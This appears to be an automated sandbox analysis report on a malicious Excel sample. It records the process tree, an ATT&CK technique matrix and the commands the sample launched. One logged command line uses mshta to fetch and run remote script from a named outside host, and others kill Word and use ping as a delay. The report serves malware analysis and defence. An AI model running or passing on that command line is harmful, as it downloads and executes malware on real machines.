Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387314345.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537773286.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332658393.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387469878.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.536752026.00000000034E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 0000000A.00000003.332658393.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387469878.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.536752026.00000000034E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 8 127.0.0.1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c start /min taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta http://facextrade.com.br/wp-includes/certificates/4.txtJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\SysWOW64\Macromed\Flash\activex.vch VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
  • Execution: 1 Windows Management Instrumentation; 121 Scripting; 23 Exploitation for Client Execution; At (Windows); Cron
  • Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
  • Privilege Escalation: 11 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
  • Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 11 Process Injection; 121 Scripting; 1 Obfuscated Files or Information
  • Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
  • Discovery: 1 Security Software Discovery; 11 Remote System Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 14 System Information Discovery
  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
  • Collection: 1 Email Collection; 1 Input Capture; 1 Archive Collected Data; Input Capture; Keylogging
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
  • Command and Control: 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels
  • Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
  • Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
  • Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings
Behavior Graph
ID: 684675
Sample: SecuriteInfo.com.Exploit.Si...
Startdate: 16/08/2022
Architecture: WINDOWS
Score: 100

Signatures:
  • Multi AV Scanner detection for domain / URL
  • Antivirus detection for URL or domain
  • Antivirus / Scanner detection for submitted sample
  • 4 other signatures

Process tree:
  • EXCEL.EXE (started)
      dropped: SecuriteInfo.com.E...en3.17149.10211.xls, Composite
      dropped: C:\Users\Public\Outlook.bat, ASCII
      signature: Document exploit detected (creates forbidden files)
    • cmd.exe (started)
        signature: Uses ping.exe to sleep
        signature: Uses ping.exe to check the status of other devices and networks
      • PING.EXE (started)
          DNS/IP: 127.0.0.1 unknown unknown
          DNS/IP: 192.168.2.1 unknown unknown
      • mshta.exe (started)
          DNS/IP: facextrade.com.br 187.45.240.69, 49743, 49744, 49748 LocawebServicosdeInternetSABR Brazil
          DNS/IP: www3.l.google.com 142.250.181.238, 443, 49749, 49750 GOOGLEUS United States
          DNS/IP: 4 other IPs or domains
      • cmd.exe (started)
        • taskkill.exe (started)
          • conhost.exe (started)
      • conhost.exe (started)
